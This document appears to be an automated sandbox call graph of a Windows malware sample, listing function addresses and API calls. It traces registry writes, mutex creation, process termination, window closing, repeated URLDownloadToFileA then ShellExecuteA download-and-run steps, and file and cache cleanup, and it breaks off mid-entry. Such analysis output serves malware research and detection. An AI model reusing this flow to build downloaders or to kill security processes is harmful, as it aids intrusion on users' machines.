5670->5671 5672 402b88 6 API calls 5671->5672 5673 406a1b 5672->5673 5674 402560 4 API calls 5673->5674 5675 406a20 5674->5675 5676 403ac0 17 API calls 5675->5676 5677 406a36 5676->5677 6859 404d48 5677->6859 5682 404dd0 17 API calls 5683 406a6a 5682->5683 5684 403a24 17 API calls 5683->5684 5685 406a7a 5684->5685 5686 403da4 17 API calls 5685->5686 5687 406a95 5686->5687 5688 404dd0 17 API calls 5687->5688 5689 406aa6 5688->5689 5690 403a24 17 API calls 5689->5690 5691 406ab6 5690->5691 5692 403da4 17 API calls 5691->5692 5693 406ad3 5692->5693 5694 404dd0 17 API calls 5693->5694 5695 406ae4 5694->5695 5696 403a24 17 API calls 5695->5696 5697 406af4 5696->5697 5698 403da4 17 API calls 5697->5698 5699 406b11 5698->5699 5700 404dd0 17 API calls 5699->5700 5701 406b22 5700->5701 5702 403a24 17 API calls 5701->5702 5703 406b32 5702->5703 5704 403da4 17 API calls 5703->5704 5705 406b4f 5704->5705 5706 404dd0 17 API calls 5705->5706 5707 406b60 5706->5707 5708 403a24 17 API calls 5707->5708 5709 406b70 5708->5709 5710 403da4 17 API calls 5709->5710 5711 406b8d 5710->5711 5712 404dd0 17 API calls 5711->5712 5713 406b9e 5712->5713 5714 403a24 17 API calls 5713->5714 5715 406bae 5714->5715 5716 403da4 17 API calls 5715->5716 5717 406bcb 5716->5717 5718 404dd0 17 API calls 5717->5718 5719 406bdc 5718->5719 5720 403a24 17 API calls 5719->5720 5721 406bec 5720->5721 5722 402ba8 4 API calls 5721->5722 5723 406bf7 5722->5723 5724 402560 4 API calls 5723->5724 5725 406bfc 5724->5725 5726 4039f4 17 API calls 5725->5726 5727 406c19 5726->5727 5728 4039d0 17 API calls 5727->5728 5729 406c21 5728->5729 5729->5594 5731 407d9d 5730->5731 5732 407da5 5731->5732 5733 407d9f 5731->5733 5732->5599 6898 4050dc GetEnvironmentVariableA 5733->6898 5737 404a32 5736->5737 5738 4049e9 5736->5738 5742 408a20 LoadIconA LoadCursorA RegisterClassA 5737->5742 5738->5737 5739 4049f0 LoadLibraryA 5738->5739 5739->5737 5740 404a08 GetProcAddress 5739->5740 5741 404a27 FreeLibrary 5740->5741 5741->5737 5743 408b10 5742->5743 5744 408a88 5742->5744 5743->5599 6934 404414 CreateWindowExA 5744->6934 5746 408aae 5746->5743 5747 408abc SetTimer 5746->5747 5748 408aeb GetMessageA 5747->5748 5749 408afb KillTimer 5748->5749 5750 408adf TranslateMessage DispatchMessageA 5748->5750 5749->5743 5750->5748 5753 4039fa 5751->5753 5752 403a20 5753->5752 5754 40248c 17 API calls 5753->5754 5754->5753 5756 4037bb 5755->5756 5759 403728 5756->5759 5760 403764 FindWindowA 5759->5760 5761 403737 5759->5761 5760->5553 5760->5554 5761->5760 5765 408550 5761->5765 5840 40854e 5761->5840 5915 408494 InternetGetConnectedState 5761->5915 5766 408558 5765->5766 5766->5766 5767 4087e5 5766->5767 5921 406f74 GetDesktopWindow 5766->5921 5769 4039f4 17 API calls 5767->5769 5772 4087ff 5769->5772 5772->5761 5775 40859b 5776 404dd0 17 API calls 5775->5776 5777 4085b1 5776->5777 5990 404c18 5777->5990 5782 404f2c 18 API calls 5783 4085db 5782->5783 5784 403b5c 17 API calls 5783->5784 5785 4085e8 5784->5785 6006 404af8 5785->6006 5788 404f2c 18 API calls 5789 40860f 5788->5789 5790 403b5c 17 API calls 5789->5790 5791 40861c 5790->5791 5792 408624 DeleteFileA 5791->5792 6015 4042ac CreateMutexA 5792->6015 5794 408638 6016 4042ac CreateMutexA 5794->6016 5796 408646 6017 4042ac CreateMutexA 5796->6017 5798 408654 5799 404f2c 18 API calls 5798->5799 5800 40865c 5799->5800 5801 404dd0 17 API calls 5800->5801 5802 40866d 5801->5802 5803 403b5c 17 API calls 5802->5803 5804 408676 5803->5804 5805 40867e DeleteFileA 5804->5805 6018 4042ac CreateMutexA 5805->6018 5807 408692 5808 404dd0 17 API calls 5807->5808 5809 40869f 5808->5809 6019 404854 5809->6019 5812 404dd0 17 API calls 5813 4086b4 5812->5813 5814 404854 39 API calls 5813->5814 5815 4086bc 5814->5815 6035 404b70 5815->6035 5818 404b70 20 API calls 5819 4086e4 5818->5819 5820 404b70 20 API calls 5819->5820 5821 4086f8 5820->5821 5822 404b70 20 API calls 5821->5822 5823 40870c 5822->5823 5824 404b70 20 API calls 5823->5824 5825 408720 5824->5825 5826 404dd0 17 API calls 5825->5826 5827 40872d 5826->5827 5828 404b70 20 API calls 5827->5828 5829 40873f 5828->5829 5830 404dd0 17 API calls 5829->5830 5831 40874c 5830->5831 5832 404b70 20 API calls 5831->5832 5833 40875e 5832->5833 5834 404d98 18 API calls 5833->5834 5835 408763 5834->5835 5836 406928 26 API calls 5835->5836 5837 408768 5836->5837 5838 408494 36 API calls 5837->5838 5839 40876d CreateThread CreateThread CreateThread CreateThread CreateThread 5838->5839 5839->5767 6142 407dd0 Sleep 5839->6142 6163 407f54 Sleep 5839->6163 6180 4084b8 Sleep 5839->6180 6183 407bec 5839->6183 6215 4072ac 5839->6215 5842 408550 5840->5842 5841 4087e5 5844 4039f4 17 API calls 5841->5844 5842->5841 5843 406f74 50 API calls 5842->5843 5845 408580 5843->5845 5847 4087ff 5844->5847 5846 4039d0 17 API calls 5845->5846 5848 40858a 5846->5848 5847->5761 5849 404dd0 17 API calls 5848->5849 5850 40859b 5849->5850 5851 404dd0 17 API calls 5850->5851 5852 4085b1 5851->5852 5853 404c18 21 API calls 5852->5853 5854 4085c6 5853->5854 5855 403a24 17 API calls 5854->5855 5856 4085d3 5855->5856 5857 404f2c 18 API calls 5856->5857 5858 4085db 5857->5858 5859 403b5c 17 API calls 5858->5859 5860 4085e8 5859->5860 5861 404af8 20 API calls 5860->5861 5862 408607 5861->5862 5863 404f2c 18 API calls 5862->5863 5864 40860f 5863->5864 5865 403b5c 17 API calls 5864->5865 5866 40861c 5865->5866 5867 408624 DeleteFileA 5866->5867 6752 4042ac CreateMutexA 5867->6752 5869 408638 6753 4042ac CreateMutexA 5869->6753 5871 408646 6754 4042ac CreateMutexA 5871->6754 5873 408654 5874 404f2c 18 API calls 5873->5874 5875 40865c 5874->5875 5876 404dd0 17 API calls 5875->5876 5877 40866d 5876->5877 5878 403b5c 17 API calls 5877->5878 5879 408676 5878->5879 5880 40867e DeleteFileA 5879->5880 6755 4042ac CreateMutexA 5880->6755 5882 408692 5883 404dd0 17 API calls 5882->5883 5884 40869f 5883->5884 5885 404854 39 API calls 5884->5885 5886 4086a7 5885->5886 5887 404dd0 17 API calls 5886->5887 5888 4086b4 5887->5888 5889 404854 39 API calls 5888->5889 5890 4086bc 5889->5890 5891 404b70 20 API calls 5890->5891 5892 4086d0 5891->5892 5893 404b70 20 API calls 5892->5893 5894 4086e4 5893->5894 5895 404b70 20 API calls 5894->5895 5896 4086f8 5895->5896 5897 404b70 20 API calls 5896->5897 5898 40870c 5897->5898 5899 404b70 20 API calls 5898->5899 5900 408720 5899->5900 5901 404dd0 17 API calls 5900->5901 5902 40872d 5901->5902 5903 404b70 20 API calls 5902->5903 5904 40873f 5903->5904 5905 404dd0 17 API calls 5904->5905 5906 40874c 5905->5906 5907 404b70 20 API calls 5906->5907 5908 40875e 5907->5908 5909 404d98 18 API calls 5908->5909 5910 408763 5909->5910 5911 406928 26 API calls 5910->5911 5912 408768 5911->5912 5913 408494 36 API calls 5912->5913 5914 40876d CreateThread CreateThread CreateThread CreateThread CreateThread 5913->5914 5914->5841 6756 407dd0 35 API calls 5914->6756 6757 407f54 58 API calls 5914->6757 6758 4084b8 37 API calls 5914->6758 6759 407bec 27 API calls 5914->6759 6760 4072ac 65 API calls 5914->6760 5916 4084b6 5915->5916 5917 4084ac 5915->5917 5916->5761 6761 4080c8 5917->6761 5922 406fab FindWindowExA GetWindowTextA 5921->5922 6043 403b3c 5922->6043 5924 406fe1 PostMessageA 5925 406fd0 5924->5925 5925->5922 5925->5924 5926 406ff1 GetDesktopWindow 5925->5926 5927 406ff8 FindWindowExA GetWindowTextA 5926->5927 5928 403b3c 17 API calls 5927->5928 5929 40701d 5928->5929 5929->5927 5930 40702e PostMessageA 5929->5930 5931 40703e GetDesktopWindow 5929->5931 5930->5929 5932 407045 FindWindowExA GetWindowTextA 5931->5932 5933 403b3c 17 API calls 5932->5933 5934 40706a 5933->5934 5934->5932 5935 40707b PostMessageA 5934->5935 5936 40708b GetDesktopWindow 5934->5936 5935->5934 5937 407092 FindWindowExA GetWindowTextA 5936->5937 5938 403b3c 17 API calls 5937->5938 5939 4070b7 5938->5939 5939->5937 5940 4070c8 PostMessageA 5939->5940 5941 4070d8 GetDesktopWindow 5939->5941 5940->5939 5942 4070df FindWindowExA GetWindowTextA 5941->5942 5943 403b3c 17 API calls 5942->5943 5944 407104 5943->5944 5944->5942 5945 407115 PostMessageA 5944->5945 5946 407125 GetDesktopWindow 5944->5946 5945->5944 5947 40712c FindWindowExA GetWindowTextA 5946->5947 5948 403b3c 17 API calls 5947->5948 5950 407151 5948->5950 5949 407162 PostMessageA 5949->5950 5950->5947 5950->5949 5951 407172 FindWindowA 5950->5951 5952 407182 FindWindowA PostMessageA 5951->5952 5953 40719a FindWindowA 5951->5953 5952->5953 5954 4071c2 FindWindowA 5953->5954 5955 4071aa FindWindowA PostMessageA 5953->5955 5956 4071f0 5954->5956 5957 4071d5 FindWindowA PostMessageA 5954->5957 5955->5954 5958 4039f4 17 API calls 5956->5958 5957->5956 5959 40720a 5958->5959 5960 4039d0 5959->5960 5961 4039f1 5960->5961 5962 4039d6 5960->5962 5964 404dd0 5961->5964 5962->5961 6075 40248c 5962->6075 5965 404dd8 5964->5965 5966 404e12 5965->5966 5967 404e05 5965->5967 6079 403a68 5966->6079 5969 4039d0 17 API calls 5967->5969 5971 404e0d 5969->5971 5975 4039f4 17 API calls 5971->5975 5972 403a68 17 API calls 5973 404e2c 5972->5973 5974 403a68 17 API calls 5973->5974 5976 404e39 5974->5976 5977 404ee5 5975->5977 5978 403a68 17 API calls 5976->5978 5979 4039d0 17 API calls 5977->5979 5980 404e46 5978->5980 5981 404eed 5979->5981 6083 403c14 5980->6083 5981->5775 6092 404bfc RegOpenKeyExA 5990->6092 5992 404c35 RegQueryValueExA 5993 404c77 5992->5993 5994 404c5d 5992->5994 5996 4039d0 17 API calls 5993->5996 5995 403b3c 17 API calls 5994->5995 5997 404c6f RegCloseKey 5995->5997 5998 404c7e RegCloseKey 5996->5998 5999 404c84 5997->5999 5998->5999 6000 403a24 5999->6000 6001 403a28 6000->6001 6004 403a38 6000->6004 6003 403a94 17 API calls 6001->6003 6001->6004 6002 403a66 6002->5782 6003->6004 6004->6002 6005 40248c 17 API calls 6004->6005 6005->6002 6093 404acc RegCreateKeyExA 6006->6093 6008 404b1e 6094 403b00 6008->6094 6010 404b2a 6011 404b32 RegSetValueExA RegCloseKey 6010->6011 6012 404b55 6011->6012 6013 4039d0 17 API calls 6012->6013 6014 404b5d 6013->6014 6014->5788 6015->5794 6016->5796 6017->5798 6018->5807 6020 404897 6019->6020 6100 4047bc 6020->6100 6022 4048b9 6105 4047dc 6022->6105 6024 404996 6026 4039f4 17 API calls 6024->6026 6025 403b3c 17 API calls 6034 4048ca 6025->6034 6028 4049b3 6026->6028 6029 4039d0 17 API calls 6028->6029 6030 4049bb 6029->6030 6030->5812 6031 40496e OpenProcess TerminateProcess 6031->6034 6033 404fdc 17 API calls 6033->6034 6034->6024 6034->6025 6034->6031 6034->6033 6110 405018 6034->6110 6120 4047fc 6034->6120 6036 404b87 6035->6036 6037 404ba9 RegOpenKeyA 6036->6037 6140 403d4c 6037->6140 6040 404be2 6041 4039f4 17 API calls 6040->6041 6042 404bef 6041->6042 6042->5818 6044 403ac0 6043->6044 6049 403a94 6044->6049 6046 403ad0 6047 4039d0 17 API calls 6046->6047 6048 403ae8 6047->6048 6048->5925 6050 403a98 6049->6050 6051 403abc 6049->6051 6054 40246c 6050->6054 6051->6046 6055 402484 6054->6055 6056 402471 6054->6056 6055->6046 6056->6055 6058 402554 6056->6058 6059 402508 6058->6059 6060 40252d 6059->6060 6064 404164 6059->6064 6072 4024fc 6060->6072 6065 404173 6064->6065 6066 404199 TlsGetValue 6064->6066 6065->6060 6067 4041a3 6066->6067 6068 40417e 6066->6068 6067->6060 6069 404120 LocalAlloc TlsSetValue 6068->6069 6070 404183 TlsGetValue 6069->6070 6071 404192 6070->6071 6071->6060 6073 4039b8 17 API calls 6072->6073 6074 402507 6073->6074 6074->6055 6076 402491 6075->6076 6077 4024a4 6075->6077 6076->6077 6078 402554 17 API calls 6076->6078 6077->5961 6078->6077 6081 403a6c 6079->6081 6080 403a90 6080->5972 6081->6080 6082 40248c 17 API calls 6081->6082 6082->6080 6084 403c25 6083->6084 6085 403c45 6084->6085 6086 403c59 6084->6086 6087 403e74 17 API calls 6085->6087 6088 403a94 17 API calls 6086->6088 6089 403c53 6087->6089 6088->6089 6090 403c8a 6089->6090 6091 403a24 17 API calls 6089->6091 6091->6090 6092->5992 6093->6008 6095 403ac0 6094->6095 6096 403a94 17 API calls 6095->6096 6097 403ad0 6096->6097 6098 4039d0 17 API calls 6097->6098 6099 403ae8 6098->6099 6099->6010 6125 404540 6100->6125 6103 4047d6 6103->6022 6104 4047cb CreateToolhelp32Snapshot 6104->6022 6106 404540 17 API calls 6105->6106 6107 4047e7 6106->6107 6108 4047f6 6107->6108 6109 4047eb Process32First 6107->6109 6108->6034 6109->6034 6112 40502a 6110->6112 6111 405067 6114 405096 6111->6114 6117 403de4 17 API calls 6111->6117 6112->6111 6129 403de4 6112->6129 6115 403a24 17 API calls 6114->6115 6116 4050a0 6115->6116 6118 4039d0 17 API calls 6116->6118 6117->6111 6119 4050b5 6118->6119 6119->6034 6121 404540 17 API calls 6120->6121 6122 404807 6121->6122 6123 404816 6122->6123 6124 40480b Process32Next 6122->6124 6123->6034 6124->6034 6126 404684 6125->6126 6127 40454f GetModuleHandleA 6125->6127 6126->6103 6126->6104 6127->6126 6128 404564 16 API calls 6127->6128 6128->6126 6134 403d9c 6129->6134 6131 403e28 6131->6112 6132 403df2 6132->6131 6133 403e74 17 API calls 6132->6133 6133->6131 6135 403d58 6134->6135 6136 403a94 17 API calls 6135->6136 6137 403d93 6135->6137 6138 403d6f 6136->6138 6137->6132 6138->6137 6139 40248c 17 API calls 6138->6139 6139->6137 6141 403d50 RegDeleteValueA RegCloseKey 6140->6141 6141->6040 6143 404f2c 18 API calls 6142->6143 6144 407df9 6143->6144 6145 403b5c 17 API calls 6144->6145 6146 407e06 6145->6146 6147 404af8 20 API calls 6146->6147 6148 407e25 6147->6148 6149 4039d0 17 API calls 6148->6149 6150 407e2f 6149->6150 6151 404dd0 17 API calls 6150->6151 6152 407e40 6151->6152 6153 404dd0 17 API calls 6152->6153 6154 407e56 6153->6154 6155 404c18 21 API calls 6154->6155 6156 407e6b 6155->6156 6157 403a24 17 API calls 6156->6157 6158 407e78 6157->6158 6159 407e87 6158->6159 6355 4068d0 InternetGetConnectedState 6158->6355 6161 4039f4 17 API calls 6159->6161 6162 407ea1 6161->6162 6164 404dd0 17 API calls 6163->6164 6165 407f89 6164->6165 6166 404dd0 17 API calls 6165->6166 6167 407f9f 6166->6167 6168 404af8 20 API calls 6167->6168 6169 407fb4 6168->6169 6170 404f2c 18 API calls 6169->6170 6171 407fbc 6170->6171 6172 403b5c 17 API calls 6171->6172 6173 407fc9 6172->6173 6174 404af8 20 API calls 6173->6174 6175 407fe8 6174->6175 6176 407ff7 6175->6176 6402 406708 InternetGetConnectedState 6175->6402 6178 4039f4 17 API calls 6176->6178 6179 408011 6178->6179 6181 408494 36 API calls 6180->6181 6182 4084c7 6181->6182 6184 407d0f 6183->6184 6187 407c12 6183->6187 6185 4039f4 17 API calls 6184->6185 6186 407d29 6185->6186 6187->6184 6188 404f2c 18 API calls 6187->6188 6189 407c31 6188->6189 6190 403b5c 17 API calls 6189->6190 6191 407c3e 6190->6191 6192 404cf4 4 API calls 6191->6192 6193 407c46 6192->6193 6193->6184 6194 404f2c 18 API calls 6193->6194 6195 407c5a 6194->6195 6196 403b5c 17 API calls 6195->6196 6197 407c67 6196->6197 6198 407c7c URLDownloadToFileA 6197->6198 6199 407c92 6198->6199 6200 407c88 Sleep 6198->6200 6201 404f2c 18 API calls 6199->6201 6200->6199 6202 407c9c 6201->6202 6203 403b5c 17 API calls 6202->6203 6204 407ca9 6203->6204 6205 404f2c 18 API calls 6204->6205 6206 407cba 6205->6206 6207 403b5c 17 API calls 6206->6207 6208 407cc7 6207->6208 6209 407ccf CopyFileA Sleep 6208->6209 6210 404f2c 18 API calls 6209->6210 6211 407ced 6210->6211 6212 403b5c 17 API calls 6211->6212 6213 407cfa 6212->6213 6214 407d02 ShellExecuteA 6213->6214 6214->6184 6216 4072b4 6215->6216 6216->6216 6217 404d04 GetVersionExA 6216->6217 6218 4072cf 6217->6218 6219 4072d8 6218->6219 6220 4076df Sleep 6218->6220 6221 404f2c 18 API calls 6219->6221 6222 404f2c 18 API calls 6220->6222 6224 4072e0 6221->6224 6223 4076f3 6222->6223 6225 403b5c 17 API calls 6223->6225 6226 403b5c 17 API calls 6224->6226 6227 407700 6225->6227 6228 4072ed 6226->6228 6229 407708 SetFileAttributesA 6227->6229 6230 4027c8 4 API calls 6228->6230 6231 404f2c 18 API calls 6229->6231 6232 407304 6230->6232 6233 407716 6231->6233 6234 402560 4 API calls 6232->6234 6235 403b5c 17 API calls 6233->6235 6236 407309 6234->6236 6237 407723 6235->6237 6238 403ed8 4 API calls 6236->6238 6241 404af8 20 API calls 6237->6241 6239 407318 6238->6239 6240 4030f4 4 API calls 6239->6240 6242 40731d 6240->6242 6243 407742 6241->6243 6244 402560 4 API calls 6242->6244 6246 4039f4 17 API calls 6243->6246 6245 407322 6244->6245 6247 402ba8 4 API calls 6245->6247 6248 40775c 6246->6248 6249 40732c 6247->6249 6250 402560 4 API calls 6249->6250 6251 407331 6250->6251 6252 404f2c 18 API calls 6251->6252 6253 407339 6252->6253 6254 403b5c 17 API calls 6253->6254 6255 407346 6254->6255 6256 4027d4 4 API calls 6255->6256 6257 40735d 6256->6257 6258 402560 4 API calls 6257->6258 6259 407362 6258->6259 6260 403ed8 4 API calls 6259->6260 6261 407371 6260->6261 6262 4030f4 4 API calls 6261->6262 6263 407376 6262->6263 6264 402560 4 API calls 6263->6264 6265 40737b 6264->6265 6266 403ed8 4 API calls 6265->6266 6267 40738a 6266->6267 6268 4030f4 4 API calls 6267->6268 6269 40738f 6268->6269 6270 402560 4 API calls 6269->6270 6271 407394 6270->6271 6272 402ba8 4 API calls 6271->6272 6273 40739e 6272->6273 6274 402560 4 API calls 6273->6274 6275 4073a3 Sleep 6274->6275 6276 404f2c 18 API calls 6275->6276 6277 4073be 6276->6277 6278 403c14 17 API calls 6277->6278 6279 4073d3 6278->6279 6280 4073db 15 API calls 6279->6280 6281 407549 6280->6281 6282 40753a SendMessageA 6280->6282 6283 404854 39 API calls 6281->6283 6282->6281 6284 407553 6283->6284 6285 404854 39 API calls 6284->6285 6286 40755d 6285->6286 6287 404854 39 API calls 6286->6287 6288 407567 6287->6288 6289 404854 39 API calls 6288->6289 6290 407571 6289->6290 6291 404854 39 API calls 6290->6291 6292 40757b 6291->6292 6293 404854 39 API calls 6292->6293 6294 407585 6293->6294 6295 404854 39 API calls 6294->6295 6296 40758f 6295->6296 6297 404854 39 API calls 6296->6297 6298 407599 6297->6298 6299 404854 39 API calls 6298->6299 6300 4075a3 6299->6300 6301 404854 39 API calls 6300->6301 6302 4075ad 6301->6302 6303 404854 39 API calls 6302->6303 6304 4075b7 6303->6304 6305 404854 39 API calls 6304->6305 6306 4075c1 6305->6306 6307 404854 39 API calls 6306->6307 6308 4075cb 6307->6308 6309 404854 39 API calls 6308->6309 6310 4075d5 6309->6310 6311 404854 39 API calls 6310->6311 6312 4075df 6311->6312 6313 404854 39 API calls 6312->6313 6314 4075e9 6313->6314 6315 404854 39 API calls 6314->6315 6316 4075f3 6315->6316 6317 404854 39 API calls 6316->6317 6318 4075fd 6317->6318 6319 404854 39 API calls 6318->6319 6320 407607 6319->6320 6321 404854 39 API calls 6320->6321 6322 407611 6321->6322 6323 404854 39 API calls 6322->6323 6324 40761b 6323->6324 6325 404854 39 API calls 6324->6325 6326 407625 6325->6326 6327 404854 39 API calls 6326->6327 6328 40762f 6327->6328 6329 404854 39 API calls 6328->6329 6330 407639 6329->6330 6331 404854 39 API calls 6330->6331 6332 407643 6331->6332 6333 404854 39 API calls 6332->6333 6334 40764d 6333->6334 6335 404854 39 API calls 6334->6335 6336 407657 6335->6336 6337 404854 39 API calls 6336->6337 6338 407661 6337->6338 6339 404f2c 18 API calls 6338->6339 6340 40766b 6339->6340 6341 403b5c 17 API calls 6340->6341 6342 407678 6341->6342 6343 407680 SetFileAttributesA 6342->6343 6344 404f2c 18 API calls 6343->6344 6345 40768e 6344->6345 6346 403b5c 17 API calls 6345->6346 6347 40769b 6346->6347 6348 404af8 20 API calls 6347->6348 6349 4076ba 6348->6349 6350 404f2c 18 API calls 6349->6350 6351 4076c2 6350->6351 6352 403b5c 17 API calls 6351->6352 6353 4076cf 6352->6353 6354 4076d7 DeleteFileA 6353->6354 6354->6243 6356 4068e8 6355->6356 6357 4068ed 6355->6357 6359 406728 6356->6359 6357->6159 6387 404f84 GetSystemDirectoryA 6359->6387 6362 403b5c 17 API calls 6363 406757 6362->6363 6392 404cf4 6363->6392 6366 406824 6369 4039f4 17 API calls 6366->6369 6368 40676c 6371 4067d7 6368->6371 6372 406788 6368->6372 6370 40683e 6369->6370 6370->6357 6373 404dd0 17 API calls 6371->6373 6374 404dd0 17 API calls 6372->6374 6375 4067e8 6373->6375 6376 406799 6374->6376 6377 404dd0 17 API calls 6375->6377 6378 404dd0 17 API calls 6376->6378 6379 4067fe 6377->6379 6380 4067af 6378->6380 6381 404dd0 17 API calls 6379->6381 6382 404dd0 17 API calls 6380->6382 6383 406814 6381->6383 6384 4067c5 6382->6384 6386 40681c ShellExecuteA 6383->6386 6385 4067cd ShellExecuteA 6384->6385 6385->6366 6386->6366 6388 403b3c 17 API calls 6387->6388 6390 404faa 6388->6390 6389 404fc6 6389->6362 6390->6389 6391 403b5c 17 API calls 6390->6391 6391->6389 6396 404c8c 6392->6396 6395 402728 GetSystemTime 6395->6368 6397 403d4c 6396->6397 6398 404ca6 FindFirstFileA 6397->6398 6399 404cb1 FindClose 6398->6399 6400 404ce5 6398->6400 6399->6400 6401 404cc0 FileTimeToLocalFileTime FileTimeToDosDateTime 6399->6401 6400->6366 6400->6395 6401->6400 6403 406720 6402->6403 6404 406725 6402->6404 6406 4066f8 6403->6406 6404->6176 6413 4055d8 6406->6413 6414 4055e0 6413->6414 6414->6414 6415 4039d0 17 API calls 6414->6415 6416 4055ff 6415->6416 6417 404dd0 17 API calls 6416->6417 6418 40560c 6417->6418 6419 403b00 17 API calls 6418->6419 6420 405620 6419->6420 6421 404f2c 18 API calls 6420->6421 6422 405628 6421->6422 6423 404dd0 17 API calls 6422->6423 6424 405639 6423->6424 6425 403b5c 17 API calls 6424->6425 6426 405642 6425->6426 6427 403b00 17 API calls 6426->6427 6428 405656 6427->6428 6429 405662 DeleteUrlCacheEntry 6428->6429 6430 403d4c 6429->6430 6431 405674 DeleteFileA 6430->6431 6432 40568a 6431->6432 6433 405697 URLDownloadToFileA 6432->6433 6434 4056a3 Sleep 6433->6434 6435 4056ad 6433->6435 6434->6435 6436 404cf4 4 API calls 6435->6436 6437 4056b9 6436->6437 6438 405859 6437->6438 6666 4027bc 6437->6666 6439 4039f4 17 API calls 6438->6439 6441 405873 6439->6441 6494 4058d0 6441->6494 6449 402560 4 API calls 6450 405701 6449->6450 6685 402ba8 6450->6685 6453 402560 4 API calls 6454 405710 6453->6454 6455 404f2c 18 API calls 6454->6455 6456 40571c 6455->6456 6457 405018 17 API calls 6456->6457 6458 40572f 6457->6458 6459 403b5c 17 API calls 6458->6459 6460 405738 6459->6460 6461 40574d URLDownloadToFileA 6460->6461 6462 405763 6461->6462 6463 405759 Sleep 6461->6463 6464 404f2c 18 API calls 6462->6464 6463->6462 6465 40576b 6464->6465 6466 405018 17 API calls 6465->6466 6467 40577e 6466->6467 6468 403b5c 17 API calls 6467->6468 6469 405787 6468->6469 6470 404cf4 4 API calls 6469->6470 6471 40578f 6470->6471 6471->6438 6472 404f2c 18 API calls 6471->6472 6473 4057a5 6472->6473 6474 405018 17 API calls 6473->6474 6475 4057b8 6474->6475 6476 403b5c 17 API calls 6475->6476 6477 4057c1 6476->6477 6478 404dd0 17 API calls 6477->6478 6479 4057d7 6478->6479 6480 4057df ShellExecuteA Sleep 6479->6480 6481 403d4c 6480->6481 6482 4057fd DeleteFileA 6481->6482 6483 403d4c 6482->6483 6484 40580f DeleteUrlCacheEntry 6483->6484 6485 403d4c 6484->6485 6486 405821 DeleteUrlCacheEntry 6485->6486 6487 404f2c 18 API calls 6486->6487 6488 40582f 6487->6488 6489 405018 17 API calls 6488->6489 6490 405842 6489->6490 6491 403b5c 17 API calls 6490->6491 6492 40584b 6491->6492 6493 405853 DeleteFileA 6492->6493 6493->6438 6495 4058d8 6494->6495 6495->6495 6496 4039d0 17 API calls 6495->6496 6497 4058f7 6496->6497 6498 404dd0 17 API calls 6497->6498 6499 405907 6498->6499 6500 403b00 17 API calls 6499->6500 6501 40591e 6500->6501 6502 404f2c 18 API calls 6501->6502 6503 405929 6502->6503 6504 404dd0 17 API calls 6503->6504 6505 405940 6504->6505 6506 403b5c 17 API calls 6505->6506 6507 40594c 6506->6507 6508 403b00 17 API calls 6507->6508 6509 405963 6508->6509 6510 40596f DeleteUrlCacheEntry 6509->6510 6511 403d4c 6510->6511 6512 405981 DeleteFileA 6511->6512 6513 405997 6512->6513 6514 4059a4 URLDownloadToFileA 6513->6514 6515 4059b0 Sleep 6514->6515 6516 4059ba 6514->6516 6515->6516 6517 404cf4 4 API calls 6516->6517 6519 4059c6 6517->6519 6518 405c65 6520 4039f4 17 API calls 6518->6520 6519->6518 6521 4027bc 4 API calls 6519->6521 6522 405c82 6520->6522 6523 4059ea 6521->6523 6524 4039d0 17 API calls 6522->6524 6525 402560 4 API calls 6523->6525 6526 405c8a 6524->6526 6527 4059ef 6525->6527 6616 405d7c 6526->6616 6528 402dec 17 API calls 6527->6528 6529 4059ff 6528->6529 6530 402e58 4 API calls 6529->6530 6531 405a09 6530->6531 6532 402560 4 API calls 6531->6532 6533 405a0e 6532->6533 6534 402ba8 4 API calls 6533->6534 6535 405a18 6534->6535 6536 402560 4 API calls 6535->6536 6537 405a1d GetEnvironmentVariableA SHGetSpecialFolderLocation SHGetPathFromIDList 6536->6537 6538 403b3c 17 API calls 6537->6538 6539 405a63 6538->6539 6540 404dd0 17 API calls 6539->6540 6541 405a73 6540->6541 6704 403ba0 6541->6704 6543 405a87 6719 4027c8 6543->6719 6546 402560 4 API calls 6547 405aad 6546->6547 6548 404dd0 17 API calls 6547->6548 6549 405abd 6548->6549 6722 403ed8 6549->6722 6617 4039d0 17 API calls 6616->6617 6618 405d9e 6617->6618 6619 404dd0 17 API calls 6618->6619 6620 405dab 6619->6620 6621 403b00 17 API calls 6620->6621 6622 405dbf 6621->6622 6623 404f2c 18 API calls 6622->6623 6624 405dc7 6623->6624 6625 404dd0 17 API calls 6624->6625 6626 405dd8 6625->6626 6627 403b5c 17 API calls 6626->6627 6628 405de1 6627->6628 6629 403b00 17 API calls 6628->6629 6630 405df5 6629->6630 6631 405e01 DeleteUrlCacheEntry 6630->6631 6632 403d4c 6631->6632 6633 405e13 DeleteFileA 6632->6633 6634 405e29 6633->6634 6635 405e36 URLDownloadToFileA 6634->6635 6636 405e42 Sleep 6635->6636 6637 405e4c 6635->6637 6636->6637 6638 404cf4 4 API calls 6637->6638 6641 405e58 6638->6641 6639 405f21 6640 4039f4 17 API calls 6639->6640 6643 405f3b 6640->6643 6641->6639 6642 4027bc 4 API calls 6641->6642 6644 405e7c 6642->6644 6643->6404 6645 402560 4 API calls 6644->6645 6646 405e81 6645->6646 6647 402dec 17 API calls 6646->6647 6648 405e91 6647->6648 6649 402e58 4 API calls 6648->6649 6650 405e9b 6649->6650 6651 402560 4 API calls 6650->6651 6652 405ea0 6651->6652 6653 402ba8 4 API calls 6652->6653 6654 405eaa 6653->6654 6655 402560 4 API calls 6654->6655 6656 405eaf 6655->6656 6657 404dd0 17 API calls 6656->6657 6658 405ecd 6657->6658 6659 404dd0 17 API calls 6658->6659 6660 405ee3 6659->6660 6661 405eeb ShellExecuteA Sleep 6660->6661 6662 403d4c 6661->6662 6663 405f09 DeleteFileA 6662->6663 6664 403d4c 6663->6664 6665 405f1b DeleteUrlCacheEntry 6664->6665 6665->6639 6692 402764 6666->6692 6669 402560 6670 404164 4 API calls 6669->6670 6671 402568 6670->6671 6672 402dec 6671->6672 6673 4039d0 17 API calls 6672->6673 6674 402df9 6673->6674 6698 402de0 6674->6698 6676 402e0d 6677 402e4d 6676->6677 6678 402de0 4 API calls 6676->6678 6679 403b5c 17 API calls 6676->6679 6680 4039d0 17 API calls 6676->6680 6681 402e58 6677->6681 6678->6676 6679->6676 6680->6676 6684 402e5b 6681->6684 6682 402e84 6682->6449 6683 402d00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6683->6684 6684->6682 6684->6683 6686 402be7 6685->6686 6687 402bb8 6685->6687 6688 402be5 6686->6688 6689 402580 4 API calls 6686->6689 6687->6686 6690 402bbe 6687->6690 6688->6453 6689->6688 6690->6688 6701 402580 6690->6701 6694 402774 6692->6694 6695 40277a 6692->6695 6693 4027b7 6693->6669 6694->6695 6697 402ba8 LocalAlloc TlsSetValue 